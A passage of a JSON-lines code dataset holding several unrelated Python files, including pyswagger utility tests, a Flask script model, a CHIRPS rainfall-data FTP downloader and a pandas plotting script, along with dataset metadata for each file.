= target\r\n\r\n def __str__(self):\r\n if self.target is not None and hasattr(self.target, 'lexinfo'):\r\n return (\r\n f\"In '{os.path.abspath(self.target.source.fname)}' at line {self.target.lineno}:\\n\"\r\n f\"{self.target.source.lines[self.target.lineno]}\\n\"\r\n f\"{' ' * self.target.chrpos}^\\n\"\r\n f\"{self.__class__.__doc__}: {self.msg}\"\r\n )\r\n else:\r\n return self.msg\r\n\r\nclass SatWarning(SatError):\r\n 'Warning'\r\n##\r\nclass SatIndexError(SatError):\r\n 'Index Error'\r\n \r\nclass SatCompilerError(SatError):\r\n\t'Compiler Error'\r\n\r\nclass SatValueError(SatError):\r\n\t'Value Error'\r\n\r\nclass SatTypeError(SatError):\r\n\t'Type Error'\r\n\r\nclass SatReferenceError(SatError):\r\n\t'Reference Error'\r\n\r\nclass SatParserError(SatError):\r\n 'Parser Error'\r\n\r\nclass SatLexerError(SatError):\r\n 'Lexer Error'\r\n\r\nclass SatSyntaxError(SatError):\r\n 'Syntax Error'\r\n\r\nclass SatExit(SatError):\r\n 'Exit'\r\n\r\n def __init__(self, code: int):\r\n self.code = code\r\n SatError.__init__(self, f'exit code {code}')\r\n","repo_name":"lucasvg/Satyrus3-FinalProject-EspTopsOTM","sub_path":"satyrus/sat/types/error.py","file_name":"error.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19580115734","text":"from flask import jsonify\nfrom flask_restful import Resource\nfrom endpoints.verify import id_to_urls, states\nfrom utils.utils import get_time\nfrom config.status_codes import STATUS_CODES\n\n\nclass IDList(Resource):\n def get(self):\n for id in states:\n status = states[id].poll()\n if status is None:\n id_to_urls[id]['status'] = 'In progress'\n elif status == 0:\n id_to_urls[id]['status'] = 'Done'\n id_to_urls[id]['stopped_at'] = get_time()\n else:\n id_to_urls[id]['status'] = STATUS_CODES.get(status, \"Failed\")\n id_to_urls[id]['stopped_at'] = get_time()\n return jsonify(id_to_urls)\n","repo_name":"adobe/frontend-regression-validator","sub_path":"_fred-v1/fred/endpoints/get_ids.py","file_name":"get_ids.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"48"} +{"seq_id":"39076576614","text":"from pyswagger import utils, errs\nfrom .utils import is_windows, is_py2\nfrom datetime import datetime\nimport unittest\nimport functools\nimport six\nimport os\n\n\nclass SwaggerUtilsTestCase(unittest.TestCase):\n \"\"\" test iso 8601 converter \"\"\"\n\n def test_iso8601_convert_from_string(self):\n \"\"\" convert string to date/datetime \"\"\"\n self.assertEqual(utils.from_iso8601('2007-04-05'), datetime(2007, 4, 5))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30'), datetime(2007, 4, 5, 14, 30))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30Z'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T12:30-02:00'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T12:30:00-02:00'), datetime(2007, 4, 5, 14, 30, tzinfo=utils.FixedTZ(0, 0)))\n self.assertEqual(utils.from_iso8601('2007-04-05T00:00:00'), datetime(2007, 4, 5, 0, 0, 0))\n self.assertEqual(utils.from_iso8601('2007-04-05T00:00:00Z'), datetime(2007, 4, 5, 0, 0, 0, tzinfo=utils.FixedTZ(0, 0)))\n # microsecond\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.1'), datetime(2007, 4, 5, 14, 30, 24, 100000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.11'), datetime(2007, 4, 5, 14, 30, 24, 110000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.111'), datetime(2007, 4, 5, 14, 30, 24, 111000))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.1111'), datetime(2007, 4, 5, 14, 30, 24, 111100))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.11111'), datetime(2007, 4, 5, 14, 30, 24, 111110))\n self.assertEqual(utils.from_iso8601('2007-04-05T14:30:24.111111'), datetime(2007, 4, 5, 14, 30, 24, 111111))\n self.assertEqual(utils.from_iso8601('2016-08-05T03:14:14.809Z'), datetime(2016, 8, 5, 3, 14, 14, 809000, tzinfo=utils.FixedTZ(0, 0)))\n\n def test_json_pointer(self):\n \"\"\" json pointer io function \"\"\"\n self.assertEqual(utils.jp_compose('/test'), '~1test')\n self.assertEqual(utils.jp_compose('~test'), '~0test')\n self.assertEqual(utils.jp_compose('/~test'), '~1~0test')\n self.assertEqual(utils.jp_compose('a', 'b'), 'b/a')\n self.assertEqual(utils.jp_compose(''), '')\n self.assertEqual(utils.jp_compose(None, 'base'), 'base')\n\n cs = ['~test1', '/test2', 'test3']\n c = utils.jp_compose(cs, 'base')\n self.assertEqual(c, 'base/~0test1/~1test2/test3')\n self.assertEqual(utils.jp_split(c)[1:], cs)\n\n self.assertEqual(utils.jp_split('~1test'), ['/test'])\n self.assertEqual(utils.jp_split('~0test'), ['~test'])\n self.assertEqual(utils.jp_split('~1~0test'), ['/~test'])\n self.assertEqual(utils.jp_split(''), [])\n self.assertEqual(utils.jp_split(None), [])\n self.assertEqual(utils.jp_split('/~1~0test/qq/~0test/~1test/'), ['', '/~test', 'qq', '~test', '/test', ''])\n\n\n def test_derelativize_url(self):\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/durf.json'), 'https://localhost/hurf/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/./durf.json'), 'https://localhost/hurf/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/../durf.json'), 'https://localhost/durf.json')\n self.assertEquals(utils.derelativise_url('https://localhost/hurf/.../durf.json'), 'https://localhost/durf.json')\n def test_scope_dict(self):\n \"\"\" ScopeDict \"\"\"\n obj = {\n 'a!b': 1,\n 'c!d!ee': 2,\n 'e!f!g': 3,\n 'a!f!g': 4,\n }\n d = utils.ScopeDict(obj)\n d.sep = '!'\n self.assertEqual(d['a!b'], 1)\n self.assertEqual(d['b'], 1)\n self.assertEqual(d['ee'], 2)\n self.assertEqual(d['a', 'b'], 1)\n self.assertEqual(d['c', 'd', 'ee'], 2)\n self.assertEqual(d['d', 'ee'], 2)\n self.assertRaises(ValueError, d.__getitem__, ('f', 'g'))\n self.assertRaises(TypeError, lambda x: d.sep)\n\n obj = {\n 'tag1!##!get': 1,\n 'tag2!##!something-get': 2,\n }\n d = utils.ScopeDict(obj)\n d.sep = '!##!'\n self.assertEqual(d['tag1', 'get'], 1)\n self.assertEqual(d['tag2', 'something-get'], 2)\n self.assertEqual(d['get'], 1)\n self.assertEqual(d['something-get'], 2)\n\n def test_dict_to_tuple(self):\n \"\"\" get_dict_as_tuple \"\"\"\n self.assertEqual(\n utils.get_dict_as_tuple({'a':'b'}),\n ('a', 'b')\n )\n\n def test_nv_tuple_list_replace(self):\n \"\"\" nv_tuple_list_replace \"\"\"\n d = [\n (1, 1),\n (2, 2),\n (3, 3)\n ]\n\n utils.nv_tuple_list_replace(d, (1, 4))\n self.assertEqual(d, [\n (1, 4),\n (2, 2),\n (3, 3)\n ])\n\n utils.nv_tuple_list_replace(d, (4, 4))\n self.assertEqual(d, [\n (1, 4),\n (2, 2),\n (3, 3),\n (4, 4)\n ])\n\n def test_import_string(self):\n \"\"\" test import_string \"\"\"\n self.assertEqual(utils.import_string('qoo_%^&%&'), None)\n self.assertNotEqual(utils.import_string('pyswagger'), None)\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_path2url_on_unix(self):\n \"\"\" test path2url \"\"\"\n self.assertEqual(utils.path2url('/opt/local/a.json'), 'file:///opt/local/a.json')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_path2url_on_windows(self):\n \"\"\" test path2url on windows \"\"\"\n self.assertEqual(utils.path2url(r'C:\\opt\\local\\a.json'), 'file:///C:/opt/local/a.json')\n\n def test_jr_split(self):\n \"\"\" test jr_split \"\"\"\n self.assertEqual(utils.jr_split(\n 'http://test.com/api/swagger.json#/definitions/s1'), (\n 'http://test.com/api/swagger.json', '#/definitions/s1'))\n self.assertEqual(utils.jr_split(\n 'http://test/com/api/'), (\n 'http://test/com/api/', '#'))\n self.assertEqual(utils.jr_split(\n '#/definitions/s1'), (\n '', '#/definitions/s1'))\n # relative path should be converted to absolute one\n self.assertEqual(utils.jr_split(\n 'user'), (\n utils.normalize_url('user'), '#'))\n self.assertEqual(utils.jr_split(\n '#'), (\n '', '#'))\n self.assertEqual(utils.jr_split(\n '//'), (\n '', '#'))\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_jr_split_on_unix(self):\n \"\"\" test jr_split on unix-like os \"\"\"\n self.assertEqual(utils.jr_split(\n '/user/tmp/local/ttt'), (\n 'file:///user/tmp/local/ttt', '#'))\n self.assertEqual(utils.jr_split(\n '/user/tmp/local/ttt/'), (\n 'file:///user/tmp/local/ttt', '#'))\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_jr_split_on_windows(self):\n \"\"\" test jr_split on windows \"\"\"\n target = 'file:///C:/user/tmp/local/ttt' if is_py2() else 'file:///c:/user/tmp/local/ttt'\n\n self.assertEqual(utils.jr_split(r'C:\\user\\tmp\\local\\ttt'), (target, '#'))\n self.assertEqual(utils.jr_split(\n # check here for adding backslach at the end of raw string\n # https://pythonconquerstheuniverse.wordpress.com/2008/06/04/gotcha-%E2%80%94-backslashes-in-windows-filenames/\n os.path.normpath('C:/user/tmp/local/ttt/')\n ), (target, '#'))\n\n def test_cycle_guard(self):\n c = utils.CycleGuard()\n c.update(1)\n self.assertRaises(errs.CycleDetectionError, c.update, 1)\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_normalize_url(self):\n self.assertEqual(utils.normalize_url(None), None)\n self.assertEqual(utils.normalize_url(''), '')\n self.assertEqual(utils.normalize_url('http://test.com/a/q.php?q=100'), 'http://test.com/a/q.php?q=100')\n self.assertEqual(utils.normalize_url('/tmp/local/test/'), 'file:///tmp/local/test')\n self.assertEqual(utils.normalize_url('/tmp/local/test'), 'file:///tmp/local/test')\n self.assertEqual(utils.normalize_url('/tmp/local/test in space.txt'), 'file:///tmp/local/test%20in%20space.txt')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix')\n def test_normalize_url_on_windows(self):\n self.assertEqual(utils.normalize_url(r'C:\\path\\to\\something'), 'file:///C:/path/to/something')\n\n def test_normalize_jr(self):\n self.assertEqual(utils.normalize_jr(None), None)\n self.assertEqual(utils.normalize_jr(None, 'http://test.com/api/swagger.json'), None)\n self.assertEqual(utils.normalize_jr('User.json', 'http://test.com/api/swagger.json'), 'http://test.com/api/User.json')\n self.assertEqual(utils.normalize_jr('definitions/User.json', 'http://test.com/api/swagger.json'), 'http://test.com/api/definitions/User.json')\n self.assertEqual(utils.normalize_jr('#/definitions/User', 'http://test.com/api/swagger.json'), 'http://test.com/api/swagger.json#/definitions/User')\n self.assertEqual(utils.normalize_jr('#/definitions/User'), '#/definitions/User')\n\n def test_get_swagger_version(self):\n self.assertEqual(utils.get_swagger_version({'swaggerVersion': '1.2'}), '1.2')\n self.assertEqual(utils.get_swagger_version({'swagger': '2.0'}), '2.0')\n self.assertEqual(utils.get_swagger_version({'qq': '20.0'}), None)\n\n def test_diff(self):\n dict1 = dict(a=1, b=[1, 2, 3])\n dict2 = dict(a=1, b=[1, 3])\n dict3 = dict(\n a=dict(a=1, b=[1, 2, 3], c=4),\n b=dict(a=2, b=[1, 2, 3], c=4),\n )\n dict4 = dict(\n a=dict(a=2, b=[1, 3], c=5),\n b=dict(a=2, b=[1, 2], c=4),\n )\n\n list1 = [dict1, dict3]\n list2 = [dict2, dict4]\n\n self.assertEqual(utils._diff_(dict1, dict2), [\n ('b', 3, 2),\n ])\n\n self.assertEqual(utils._diff_(dict2, dict1), [\n ('b', 2, 3),\n ])\n\n self.assertEqual(sorted(utils._diff_(dict3, dict4)), sorted([\n ('a/a', 1, 2), ('a/b', 3, 2), ('a/c', 4, 5), ('b/b', 3, 2)\n ]))\n\n self.assertEqual(sorted(utils._diff_(list1, list2)), sorted([\n ('0/b', 3, 2),\n ('1/a/a', 1, 2),\n ('1/a/b', 3, 2),\n ('1/a/c', 4, 5),\n ('1/b/b', 3, 2)\n ]))\n\n # test include\n self.assertEqual(sorted(utils._diff_(dict3, dict4, include=['a'])), sorted([\n ('a/a', 1, 2)\n ]))\n # test exclude\n self.assertEqual(sorted(utils._diff_(dict3, dict4, exclude=['a'])), sorted([\n ('b/b', 3, 2)\n ]))\n # test include and exclude\n self.assertEqual(sorted(utils._diff_(dict3, dict4, include=['a', 'b'], exclude=['a'])), sorted([\n ('b/b', 3, 2)\n ]))\n\n def test_get_or_none(self):\n \"\"\" test for get_or_none\n \"\"\"\n class A(object): pass\n a = A()\n setattr(A, 'b', A())\n setattr(a.b, 'c', A())\n setattr(a.b.c, 'd', 'test string')\n self.assertEqual(utils.get_or_none(a, 'b', 'c', 'd'), 'test string')\n self.assertEqual(utils.get_or_none(a, 'b', 'c', 'd', 'e'), None)\n\n def test_url_dirname(self):\n \"\"\" test url_dirname\n \"\"\"\n self.assertEqual(utils.url_dirname('https://localhost/test/swagger.json'), 'https://localhost/test')\n self.assertEqual(utils.url_dirname('https://localhost/test/'), 'https://localhost/test/')\n self.assertEqual(utils.url_dirname('https://localhost/test'), 'https://localhost/test')\n\n def test_url_join(self):\n \"\"\" test url_join\n \"\"\"\n self.assertEqual(utils.url_join('https://localhost/test', 'swagger.json'), 'https://localhost/test/swagger.json')\n self.assertEqual(utils.url_join('https://localhost/test/', 'swagger.json'), 'https://localhost/test/swagger.json')\n\n @unittest.skipUnless(not is_windows(), 'make no sense on windows')\n def test_patch_path(self):\n \"\"\" make sure patch_path works\n \"\"\"\n self.assertEqual(utils.patch_path(\n '/Users/sudeep.agarwal/src/squiddy/api/v0.1',\n '/Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml',\n ), '/Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml')\n\n @unittest.skipUnless(is_windows(), 'make no sense on unix-like os')\n def test_patch_path_on_windows(self):\n self.assertEqual(utils.patch_path(\n 'Users/sudeep.agarwal/src/squiddy/api/v0.1',\n 'Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml',\n ), 'Users/sudeep.agarwal/src/squiddy/api/v0.1/swagger.yaml')\n\n\nclass WalkTestCase(unittest.TestCase):\n \"\"\" test for walk \"\"\"\n\n @staticmethod\n def _out(conf, idx):\n return conf[idx]\n\n def test_self_cycle(self):\n conf = {\n 0: [0]\n }\n\n cyc = utils.walk(\n 0, functools.partial(WalkTestCase._out, conf)\n )\n self.assertEqual(cyc, [[0, 0]])\n\n def test_1_long_cycle(self):\n conf = {\n 0: [1],\n 1: [2],\n 2: [3],\n 3: [4],\n 4: [5],\n 5: [1]\n }\n\n cyc = []\n for i in range(6):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [[1, 2, 3, 4, 5, 1]])\n\n def test_multiple_cycles(self):\n conf = {\n 0: [6],\n 1: [6],\n 2: [0],\n 3: [1],\n 4: [4],\n 5: [3],\n 6: [3],\n 7: [4],\n 8: [0]\n }\n\n cyc = []\n for i in range(9):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [\n [1, 6, 3, 1],\n [4, 4]\n ])\n\n def test_cycles_share_border(self):\n conf = {\n 0: [1],\n 1: [2],\n 2: [3],\n 3: [0, 5],\n 4: [2],\n 5: [4]\n }\n\n cyc = []\n for i in range(6):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [\n [0, 1, 2, 3, 0],\n [2, 3, 5, 4, 2]\n ])\n\n def test_no_cycle(self):\n conf = {\n 0: [1, 2],\n 1: [2, 3],\n 2: [3, 4],\n 3: [4, 5],\n 4: [5, 6],\n 5: [6, 7],\n 6: [7],\n 7: []\n }\n\n cyc = []\n for i in range(8):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(cyc, [])\n\n def test_multiple_cycles_2(self):\n conf = {\n 0: [1, 4],\n 1: [2],\n 2: [0, 3],\n 3: [4, 5],\n 4: [1, 2],\n 5: [4]\n }\n\n cyc = []\n for i in range(6):\n cyc = utils.walk(\n i,\n functools.partial(WalkTestCase._out, conf),\n cyc\n )\n\n self.assertEqual(sorted(cyc), sorted([\n [0, 1, 2, 0],\n [0, 4, 1, 2, 0],\n [0, 4, 2, 0],\n [1, 2, 3, 4, 1],\n [1, 2, 3, 5, 4, 1],\n [2, 3, 5, 4, 2],\n [2, 3 ,4, 2]\n ]))\n\n def test_case_insensitive_dict(self):\n \"\"\" test utils.CaseInsensitiveDict\n \"\"\"\n normal = utils.CaseInsensitiveDict()\n normal['Content-Type'] = 'application/json'\n self.assertTrue('Content-Type' in normal)\n self.assertTrue('content-type' in normal)\n self.assertEqual(normal['content-type'], 'application/json')\n\n # test iteration\n for k, v in normal.iteritems():\n self.assertEqual(k, 'Content-Type')\n self.assertEqual(v, 'application/json')\n break\n else:\n # should not reach here\n self.assertTrue(False)\n\n for v in normal.itervalues():\n self.assertEqual(v, 'application/json')\n break\n else:\n # should not reach here\n self.assertTrue(False)\n","repo_name":"pyopenapi/pyswagger","sub_path":"pyswagger/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":16610,"program_lang":"python","lang":"en","doc_type":"code","stars":372,"dataset":"github-code","pt":"48"} +{"seq_id":"22909359202","text":"from app.models.baseModel import BaseModel\nfrom app.models.scripts.errors import ScriptNotFoundException\nfrom app.models.users.user import User\n\n\nclass Script(BaseModel):\n def __init__(self, name, body, _id=None):\n self.name = name\n self.body = body\n super().__init__(_id)\n\n @classmethod\n def add(cls, user: User, new_script):\n \"\"\"\n Adds a new script to the given user.\n :param user: User object\n :param new_script: The new script to be added to the user\n :return: A brand new script\n \"\"\"\n script = cls(**new_script)\n user.scripts.append(script)\n user.update_mongo()\n return new_script\n\n @staticmethod\n def get_user_scripts(user: User):\n \"\"\"\n Retrieves the information of all the scripts associated to one user.\n :param user: User object\n :return: All the scripts of the current user\n \"\"\"\n return user.scripts\n\n @staticmethod\n def get(user: User, script_id):\n \"\"\"\n Retrieves the information of the script with the given id.\n :param user: User object\n :param script_id: The id of the script to be read from the user\n :return: The requested script\n \"\"\"\n for script in user.scripts:\n if script.json()[\"_id\"] == script_id:\n return script\n raise ScriptNotFoundException(\"El Script con el ID dado no existe\")\n\n @staticmethod\n def update(user: User, _id, data):\n \"\"\"\n Updates the information (name and/or body message) from the script with the given id.\n :param user: User object\n :param _id: The ID of the script to be updated\n :param data: Dictionary containing the information of the name and body message to be updated\n :return: All the scripts of the current user, with updated data\n \"\"\"\n for script in user.scripts:\n if script.json()[\"_id\"] == _id:\n user.scripts[user.scripts.index(script)].name = data[\"name\"]\n user.scripts[user.scripts.index(script)].body = data[\"body\"]\n user.update_mongo()\n return user.scripts\n raise ScriptNotFoundException(\"El Script con el ID dado no existe\")\n\n @staticmethod\n def delete(user: User, _id):\n \"\"\"\n Removes from the user's array of scripts the script with the given id.\n :param user: User object\n :param _id: The ID of the script to be deleted\n :return: The remaining scripts of the user\n \"\"\"\n for script in user.scripts:\n if script.json()[\"_id\"] == _id:\n user.scripts.remove(script)\n user.update_mongo()\n return user.scripts\n raise ScriptNotFoundException(\"El Script con el ID dado no existe\")\n\n","repo_name":"iThinkEmo/Iualia-doc-sphinx","sub_path":"app/models/scripts/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31272652735","text":"# -*- coding: utf-8 -*-\n\"\"\"\n**CHIRPS**\n\n`Restrictions`\n\nThe data and this python file may not be distributed to others without\npermission of the WA+ team.\n\n`Description`\n\nThis module downloads daily and monthly CHIRPS 2.0 data from\n``ftp://chg-ftpout.geog.ucsb.edu server``.\n\nUse the CHIRPS.daily or CHIRPS.monthly functions to download\nand create daily or monthly CHIRPS images in Gtiff format.\n\nThe **CHIRPS** data is available since ``1981-01-01 till now``.\n\n**Examples:**\n::\n\n from wateraccounting.Collect import CHIRPS\n CFSR.daily(Dir='C:/Temp/',\n Startdate='2003-12-01', Enddate='2004-01-20',\n latlim=[-10, 30], lonlim=[-20, -10])\n\n CFSR.monthly(Dir='C:/Temp/',\n Startdate='2003-12-01', Enddate='2004-01-20',\n latlim=[-10, 30], lonlim=[-20, -10])\n\"\"\"\n# General modules\nimport os\n# import sys\n# import glob\n# import shutil\n\n# # import math\n# # import datetime\n\nfrom ftplib import FTP\nfrom joblib import Parallel, delayed\n\nimport numpy as np\nimport pandas as pd\nfrom netCDF4 import Dataset\n\n# Water Accounting Modules\ntry:\n from .download import Download\nexcept ImportError:\n from src.wateraccounting.Collect.download import Download\n\n\ndef DownloadData(Dir, Startdate, Enddate, latlim, lonlim, Waitbar, cores, TimeCase):\n \"\"\"\n This function downloads CHIRPS daily or monthly data\n\n Keyword arguments:\n Dir -- 'C:/file/to/path/'\n Startdate -- 'yyyy-mm-dd'\n Enddate -- 'yyyy-mm-dd'\n latlim -- [ymin, ymax] (values must be between -50 and 50)\n lonlim -- [xmin, xmax] (values must be between -180 and 180)\n Waitbar -- 1 (Default) will print a waitbar\n cores -- The number of cores used to run the routine. It can be 'False'\n to avoid using parallel computing routines.\n TimeCase -- String equal to 'daily' or 'monthly'\n \"\"\"\n # Define timestep for the timedates\n if TimeCase == 'daily':\n TimeFreq = 'D'\n output_folder = os.path.join(Dir, 'Precipitation', 'CHIRPS', 'Daily')\n elif TimeCase == 'monthly':\n TimeFreq = 'MS'\n output_folder = os.path.join(Dir, 'Precipitation', 'CHIRPS', 'Monthly')\n else:\n raise KeyError(\"The input time interval is not supported\")\n\n # make directory if it not exists\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n # check time variables\n if not Startdate:\n Startdate = pd.Timestamp('1981-01-01')\n if not Enddate:\n Enddate = pd.Timestamp('Now')\n\n # Create days\n Dates = pd.date_range(Startdate, Enddate, freq=TimeFreq)\n\n # Create Waitbar\n if Waitbar == 1:\n import watools.Functions.Start.WaitbarConsole as WaitbarConsole\n total_amount = len(Dates)\n amount = 0\n WaitbarConsole.printWaitBar(amount, total_amount, prefix='Progress:',\n suffix='Complete', length=50)\n\n # Check space variables\n if latlim[0] < -50 or latlim[1] > 50:\n print('Latitude above 50N or below 50S is not possible.'\n ' Value set to maximum')\n latlim[0] = np.max(latlim[0], -50)\n latlim[1] = np.min(lonlim[1], 50)\n if lonlim[0] < -180 or lonlim[1] > 180:\n print('Longitude must be between 180E and 180W.'\n ' Now value is set to maximum')\n lonlim[0] = np.max(latlim[0], -180)\n lonlim[1] = np.min(lonlim[1], 180)\n\n # Define IDs\n yID = 2000 - np.int16(np.array([np.ceil((latlim[1] + 50) * 20),\n np.floor((latlim[0] + 50) * 20)]))\n xID = np.int16(np.array([np.floor((lonlim[0] + 180) * 20),\n np.ceil((lonlim[1] + 180) * 20)]))\n\n # Pass variables to parallel function and run\n args = [output_folder, TimeCase, xID, yID, lonlim, latlim]\n if not cores:\n for Date in Dates:\n RetrieveData(Date, args)\n if Waitbar == 1:\n amount += 1\n WaitbarConsole.printWaitBar(amount, total_amount, prefix='Progress:',\n suffix='Complete', length=50)\n results = True\n else:\n results = Parallel(n_jobs=cores)(delayed(RetrieveData)(Date, args)\n for Date in Dates)\n return results\n\n\ndef RetrieveData(Date, args):\n \"\"\"\n This function retrieves CHIRPS data for a given date from the\n ftp://chg-ftpout.geog.ucsb.edu server.\n\n Keyword arguments:\n Date -- 'yyyy-mm-dd'\n args -- A list of parameters defined in the DownloadData function.\n \"\"\"\n # Argument\n [output_folder, TimeCase, xID, yID, lonlim, latlim] = args\n\n # open ftp server\n ftp = FTP(\"chg-ftpout.geog.ucsb.edu\", \"\", \"\")\n ftp.login()\n\n # Define FTP path to directory\n if TimeCase == 'daily':\n pathFTP = 'pub/org/chg/products/CHIRPS-2.0/global_daily/tifs/p05/%s/' % Date.strftime(\n '%Y')\n elif TimeCase == 'monthly':\n pathFTP = 'pub/org/chg/products/CHIRPS-2.0/global_monthly/tifs/'\n else:\n raise KeyError(\"The input time interval is not supported\")\n\n # find the document name in this directory\n ftp.cwd(pathFTP)\n listing = []\n\n # read all the file names in the directory\n ftp.retrlines(\"LIST\", listing.append)\n\n # create all the input name (filename) and output (outfilename, filetif, DiFileEnd) names\n if TimeCase == 'daily':\n filename = 'chirps-v2.0.%s.%02s.%02s.tif.gz' % (\n Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d'))\n outfilename = os.path.join(output_folder, 'chirps-v2.0.%s.%02s.%02s.tif' % (\n Date.strftime('%Y'), Date.strftime('%m'), Date.strftime('%d')))\n DirFileEnd = os.path.join(output_folder,\n 'P_CHIRPS.v2.0_mm-day-1_daily_%s.%02s.%02s.tif' % (\n Date.strftime('%Y'), Date.strftime('%m'),\n Date.strftime('%d')))\n elif TimeCase == 'monthly':\n filename = 'chirps-v2.0.%s.%02s.tif.gz' % (\n Date.strftime('%Y'), Date.strftime('%m'))\n outfilename = os.path.join(output_folder, 'chirps-v2.0.%s.%02s.tif' % (\n Date.strftime('%Y'), Date.strftime('%m')))\n DirFileEnd = os.path.join(output_folder,\n 'P_CHIRPS.v2.0_mm-month-1_monthly_%s.%02s.%02s.tif' % (\n Date.strftime('%Y'), Date.strftime('%m'),\n Date.strftime('%d')))\n else:\n raise KeyError(\"The input time interval is not supported\")\n\n # download the global rainfall file\n try:\n local_filename = os.path.join(output_folder, filename)\n lf = open(local_filename, \"wb\")\n ftp.retrbinary(\"RETR \" + filename, lf.write, 8192)\n lf.close()\n\n # unzip the file\n zip_filename = os.path.join(output_folder, filename)\n DC.Extract_Data_gz(zip_filename, outfilename)\n\n # open tiff file\n dataset = RC.Open_tiff_array(outfilename)\n\n # clip dataset to the given extent\n data = dataset[yID[0]:yID[1], xID[0]:xID[1]]\n data[data < 0] = -9999\n\n # save dataset as geotiff file\n geo = [lonlim[0], 0.05, 0, latlim[1], 0, -0.05]\n DC.Save_as_tiff(name=DirFileEnd, data=data, geo=geo, projection=\"WGS84\")\n\n # delete old tif file\n os.remove(outfilename)\n\n except:\n print(\"file not exists\")\n return True\n","repo_name":"IHEProjects/WaterAccounting","sub_path":"src/wateraccounting/Collect/products/CHIRPS.py","file_name":"CHIRPS.py","file_ext":"py","file_size_in_byte":7414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42043431418","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv('drugs.csv')\n\ngrp = data.groupby(['Year'])\nyr_mean = grp.mean()\nyr_mean = yr_mean.reset_index()\n\nrate12 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_12-17\"]\nrate18 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_18-25\"]\nrate26 = yr_mean[\"Rates_Pain Relievers Abuse Past Year_26+\"]\n\nyr = yr_mean[\"Year\"]\nplt.bar(yr, rate18 + rate12 + rate26)\nplt.bar(yr, rate18 + rate12)\nplt.bar(yr.values, rate12)\n\n\n\n\n\n\nplt.show()\n","repo_name":"dvanderelst/GradStats","sub_path":"DataScenarios/scenario_Drugs/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4889759502","text":"# Databricks notebook source\n# MAGIC %run ../includes/configuration\n\n# COMMAND ----------\n\n# MAGIC %run ../includes/common_functions\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 1 - Ingest file & apply schema\n\n# COMMAND ----------\n\n#write schema\nfrom pyspark.sql.types import StructField, StructType, IntegerType, StringType, TimestampType\n\nraces_schema = StructType([StructField('raceId',IntegerType(), nullable=False), \\\n StructField('year',IntegerType(), nullable=True), \\\n StructField('round',IntegerType(), nullable=True), \\\n StructField('circuitId',IntegerType(), nullable=False), \\\n StructField('name',StringType(), nullable=True), \\\n StructField('date',StringType(), nullable=True), \\\n StructField('time',StringType(), nullable=True)])\n\n# COMMAND ----------\n\n#load file\nraces_df = spark.read \\\n .schema(races_schema) \\\n .option('header', True) \\\n .csv(f\"{raw_folder_path}/races.csv\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 2 - Drop unwanted column\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import col\n\nselected_races_df = races_df.select(col('raceId'),col('year'),col('round'),col('circuitId'),col('name'),col('date'),col('time'))\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 3 - Rename columns\n\n# COMMAND ----------\n\nrenamed_races_df = selected_races_df.withColumnRenamed('raceId','race_id') \\\n .withColumnRenamed('year','race_year') \\\n .withColumnRenamed('circuitID','circuit_id')\n\n# COMMAND ----------\n\ntype(renamed_races_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 4 - Add column\n\n# COMMAND ----------\n\ningestion_races_df = add_ingestion_date(renamed_races_df)\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC ### Step 5 - Transform column\n\n# COMMAND ----------\n\nfrom pyspark.sql.functions import to_timestamp, concat, lit\n\ntransform_races_df = 